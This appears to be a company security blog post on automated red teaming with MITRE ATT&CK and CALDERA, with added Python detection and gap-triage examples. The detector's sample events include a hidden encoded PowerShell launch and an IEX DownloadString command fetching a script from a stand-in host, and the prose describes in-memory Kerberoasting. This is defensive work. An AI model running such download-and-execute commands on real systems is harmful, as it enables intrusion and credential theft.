Introduction
Like all global hosting and cloud providers, we regularly find ourselves the target of attacks, either against our customer infrastructure or against our workstations. In order to find potential gaps before an attacker does, we came up with the plan of automated Red Teaming.
The project ART (Automated Red Teaming) aims to conduct adversary emulation on IONOS’ internal infrastructure in order to better understand the actions and techniques an attacker would use and how our defenses would react to them. For this purpose we use an industry-standard threat knowledge base, MITRE ATT&CK, which acts as a foundation for enterprise red teaming, and MITRE’s open-source software CALDERA, which helps automate the adversary emulation process.
Why do we do Red Teaming?
Even though the main focus of ART is to assess and improve our endpoint security, we use its outcome for various other purposes as well. For example, it can help identify and validate whether a particular threat group could affect us, by mapping our security assessment and the techniques used by that threat group onto the MITRE ATT&CK matrix. We can also use this information to compare security products and determine which tool protects or responds better against these attacks.
How do we perform Red Teaming?
The first step in red teaming is to choose the target infrastructure. At IONOS, employees can choose between Windows, Linux or macOS on their personal workstations, and our solution covers all of them. The MITRE ATT&CK™ knowledge base gives information on all known attack techniques used by adversaries against these operating systems in real-world scenarios. Most of these techniques can be tested individually by running small scripts or commands on a target. With ART we run all these attacker commands automatically on a remote target and observe how our security solutions react to each one of them.
Example
If we want to test for MITRE technique T1059.001 Command and Scripting Interpreter: PowerShell, we select it in our software’s web interface and see 29 different test methods available for it. We choose one or more of these tests, which contain simple PowerShell commands, and run them on the target machine remotely from the web UI. Within a few seconds the output of those commands starts showing up and tells us whether they ran successfully or not. Meanwhile we check whether what we expected was actually detected by the anti-virus/SIEM/IDS solutions in place. The tests that are not detected as expected are the gaps that pose a risk and need to be fixed. For example, we observed that our anti-virus was not detecting a test that used PowerShell to execute an encoded command using the ‘/e’ parameter.
This is a technique often used by malware to avoid detection and download next-stage payloads onto a target machine. It was fixed by deploying a new anti-virus rule that blocks execution of PowerShell command lines using the ‘/e’ parameter, as there was no legitimate use case for it in the target infrastructure.
Results
As Windows clients are the most used by IONOS employees, we started with Windows as the first target. We tested around 200 adversary techniques on a test client in the employee network, keeping all the security solutions as they are. Of these, 102 techniques ran successfully without any detection by our security solutions. So far we have been able to fix most of these major gaps by adding new anti-virus rules for the clients, as seen below.
Figure 2: Number of detection gaps that were found and the ones that are fixed so far
The severity of the gaps found is usually taken from the MITRE CAPEC database on a rough scale (Low, Medium, High). For some attack techniques CAPEC does not give a severity, so an intuitive severity is assigned based on the likelihood, risk and possible impact of the technique.
High Risk
Easy to execute using built-in system features and normal user privileges, with high impact, such as stolen user credentials leading to unauthorized access to an internal server without any detection.
An example: T1558.003 Steal or Forge Kerberos Tickets
An attacker or malicious insider with access to a domain-joined system can execute PowerSploit’s Invoke-Kerberoast module directly in memory from a remote URL and request service tickets that return password hashes for service accounts. These hashed passwords can be exfiltrated and cracked offline by the attacker and later used for privilege escalation and lateral movement with valid account credentials, all without any detection by our endpoint security.
To mitigate this we created an anti-virus rule that monitors whether any such PowerShell module is invoked from an external location. An alternative solution would have been to enable AMSI (the Antimalware Scan Interface), which scans scripts as they run in memory, on all clients, but this was not possible due to technical issues.
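Both gaps described so far, the encoded ‘/e’ command line from the Example section and the module pulled from a remote URL and run in memory, leave traces in the process command line. The following is an added example of detection logic over constructed process-creation events, not code from ART or CALDERA: the event field names (host, image, command_line), the rule names and the sample command lines are assumptions, and the encoded payload is a constructed harmless string.

```python
"""Detection checks for the two PowerShell gaps described in the post.

Added example, not code from ART or CALDERA. It scans process-creation
style events (constructed below, loosely modelled on the CommandLine field
of Sysmon Event ID 1 / Windows 4688) for:
  1. powershell.exe started with the EncodedCommand switch (-e, -ec, -enc,
     -EncodedCommand, or the '/e' form from the post) and decodes the
     Base64-wrapped UTF-16LE payload so an analyst can read it;
  2. a script fetched from a remote URL and executed in memory
     (IEX/Invoke-Expression combined with DownloadString, DownloadFile,
     Invoke-WebRequest or iwr, in either order).
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# powershell.exe accepts abbreviations of -EncodedCommand and either '-' or
# '/' as the switch character, so both forms are covered.
ENCODED_SWITCH = re.compile(
    r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
REMOTE_INVOKE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b"
    r"|\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b.*?\b(?:iex|invoke-expression)\b",
    re.IGNORECASE | re.DOTALL,
)
POWERSHELL_IMAGE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    rule: str
    command_line: str
    decoded_payload: Optional[str] = None


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    match = ENCODED_SWITCH.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def check_event(event: Dict[str, str]) -> List[Finding]:
    """Apply both rules to one process-creation event of a PowerShell image."""
    findings: List[Finding] = []
    if not POWERSHELL_IMAGE.search(event["image"]):
        return findings
    cmd = event["command_line"]
    if ENCODED_SWITCH.search(cmd):
        findings.append(Finding(event["host"], "powershell_encoded_command", cmd,
                                decode_encoded_command(cmd)))
    if REMOTE_INVOKE.search(cmd):
        findings.append(Finding(event["host"], "powershell_remote_script_in_memory", cmd))
    return findings


def scan(events) -> List[Finding]:
    return [f for e in events for f in check_event(e)]


# Constructed sample telemetry, not real IONOS data.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PLAINTEXT = "Write-Host 'ART test'"  # constructed harmless payload
ENCODED_B64 = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": PS_IMAGE,   # legitimate admin script: no finding
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "ws-02", "image": PS_IMAGE,
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_B64}"},
    {"host": "ws-03", "image": PS_IMAGE,
     "command_line": f"powershell.exe /e {ENCODED_B64}"},
    {"host": "ws-04", "image": PS_IMAGE,
     "command_line": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://files.example.invalid/remote-module.ps1')\""},
    {"host": "ws-05", "image": r"C:\Windows\System32\cmd.exe",  # not PowerShell: skipped
     "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.host}: {finding.command_line}")
        if finding.decoded_payload:
            print(f"    decoded: {finding.decoded_payload}")
```

Requiring both an Invoke-Expression and a download primitive in the same command line keeps ordinary `Invoke-WebRequest` use in admin scripts out of the alerts; the decoded payload is attached to the finding so the analyst sees what the encoded command would have run.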
Medium Risk
A bit more difficult to execute and requires special privileges or pre-existing conditions, e.g. dumping Windows usernames and hashed passwords from the SAM registry hive with administrative privileges.
Low Risk
Used in combination with High and Medium Risk techniques, mainly for reconnaissance; very similar to legitimate user behavior, e.g. running network and system discovery commands or sending out data in encrypted traffic.
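The Results section counts detection gaps and Figure 2 splits them into found and fixed, while the severity rules above decide which bucket each gap lands in. The following is an added example of that triage, not code from ART or CALDERA: the record fields, the fallback rule for techniques without a CAPEC severity, and the sample results are assumptions made for illustration.

```python
"""Gap triage for ART-style test results.

Added example, not code from ART or CALDERA. It takes one record per
technique test as the post describes them (did the test run, was it
detected, has the gap since been closed), assigns a severity from a
CAPEC-style value when one exists and otherwise falls back to the post's
intuitive Low/Medium/High scale, and produces the found-vs-fixed counts
behind a chart like Figure 2. Field names and the fallback rule are
assumptions made for illustration.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

SEVERITIES = ("Low", "Medium", "High")


@dataclass
class TestResult:
    technique: str                  # ATT&CK technique id
    ran: bool                       # test executed successfully on the target
    detected: bool                  # AV / SIEM / IDS raised an alert
    fixed: bool = False             # a new rule has since closed the gap
    capec_severity: Optional[str] = None   # Low/Medium/High when CAPEC provides one
    needs_privileges: bool = False  # requires admin rights or other preconditions
    high_impact: bool = False       # e.g. credential theft, unauthorized access


def severity_of(result: TestResult) -> str:
    """CAPEC value wins; otherwise: high impact with plain user rights -> High,
    needs privileges or preconditions -> Medium, recon-like behaviour -> Low."""
    if result.capec_severity in SEVERITIES:
        return result.capec_severity
    if result.high_impact and not result.needs_privileges:
        return "High"
    if result.needs_privileges:
        return "Medium"
    return "Low"


def detection_gaps(results: Iterable[TestResult]) -> List[TestResult]:
    """A gap is a test that ran and was not detected. Tests that failed to
    run are inconclusive and count as neither gap nor detection."""
    return [r for r in results if r.ran and not r.detected]


def gap_report(results: Iterable[TestResult]) -> Dict[str, Dict[str, int]]:
    """Found / fixed counts per severity, i.e. the numbers behind Figure 2."""
    report = {s: {"found": 0, "fixed": 0} for s in SEVERITIES}
    for gap in detection_gaps(list(results)):
        bucket = report[severity_of(gap)]
        bucket["found"] += 1
        if gap.fixed:
            bucket["fixed"] += 1
    return report


def detection_rate(results: Iterable[TestResult]) -> float:
    """Share of tests that ran and were detected; 0.0 when nothing ran."""
    ran = [r for r in results if r.ran]
    return sum(r.detected for r in ran) / len(ran) if ran else 0.0


# Constructed sample data, not IONOS results.
SAMPLE_RESULTS = [
    TestResult("T1059.001", ran=True, detected=False, fixed=True, high_impact=True),
    TestResult("T1558.003", ran=True, detected=False, fixed=True, high_impact=True),
    TestResult("T1003.002", ran=True, detected=False, capec_severity="Medium", needs_privileges=True),
    TestResult("T1016", ran=True, detected=True),
    TestResult("T1048", ran=True, detected=False),
    TestResult("T1027", ran=False, detected=False),   # test errored out: inconclusive
]

if __name__ == "__main__":
    for severity, counts in gap_report(SAMPLE_RESULTS).items():
        print(f"{severity:6} found={counts['found']} fixed={counts['fixed']}")
    print(f"detection rate: {detection_rate(SAMPLE_RESULTS):.0%}")
```

Keeping tests that failed to run out of both the gap count and the detection rate matters when comparing security products: a test that errored out on one client says nothing about whether that client's tooling would have caught it.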
In Closing
Most traditional security solutions rely on threat IOCs (Indicators of Compromise) such as hash values, IP addresses, URLs, etc., which are inconsistent and quickly become outdated. It is difficult to measure the security level of a network simply based on these IOCs and patch levels. Red Teaming helps us think beyond that and evaluate a network from an attacker’s perspective. Using software like CALDERA we can find definite gaps in our security posture, focus on improving those and obtain measurable metrics for the security level.